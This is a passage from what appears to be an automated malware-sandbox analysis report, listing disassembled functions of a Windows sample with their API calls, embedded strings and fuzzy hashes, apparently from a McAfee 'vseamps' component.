                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                    • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                    • API String ID: 2587151837-1427723692
                                                    • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                    • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                    • String ID: SetDllDirectoryW$kernel32.dll
                                                    • API String ID: 3184163350-3826188083
                                                    • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                    • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3424473247-996641649
                                                    • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                    • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1775797328-0
                                                    • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                    • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                    • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 1232609184-0
                                                    • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                    • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                    • String ID: H
                                                    • API String ID: 2107338056-2852464175
                                                    • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                    • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                    • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                    • API String ID: 1322048431-2685357988
                                                    • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                    • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                    • API String ID: 2984211723-3002863673
                                                    • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                    • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                    • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                    • API String ID: 678758403-4129911376
                                                    • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                    • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3424473247-0
                                                    • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                    • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                    • String ID: bad exception$csm$csm$csm
                                                    • API String ID: 3766904988-820278400
                                                    • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                    • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                    • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                    • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                    • String ID:
                                                    • API String ID: 2707001247-0
                                                    • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                    • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction ID: 5f6c4c6cd2d0a406009de68e808ca1e35b3779b3abf118ad6cbe70e9de96c55b
                                                    • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction Fuzzy Hash: F4D16D37A09789CAEB22DF65D4503AD67A0FB56B88F100135EA8D57B96DF7CE081C704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                    • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                    • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction ID: fde0e8f52b11d09605364cf188709883956235a3e02f9e3851d04f6f2126eab5
                                                    • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction Fuzzy Hash: 6341C62BB1BA8A91FA17CF16983077A2392BF06FA0F494535DD0D47796EE3CE4458708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                    • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 1119674940-1966266597
                                                    • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                    • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3702919091-996641649
                                                    • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                    • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$Info
                                                    • String ID:
                                                    • API String ID: 1775632426-0
                                                    • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                    • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71B1
                                                    • GetLastError.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71BF
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71E9
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D7257
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D7263
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
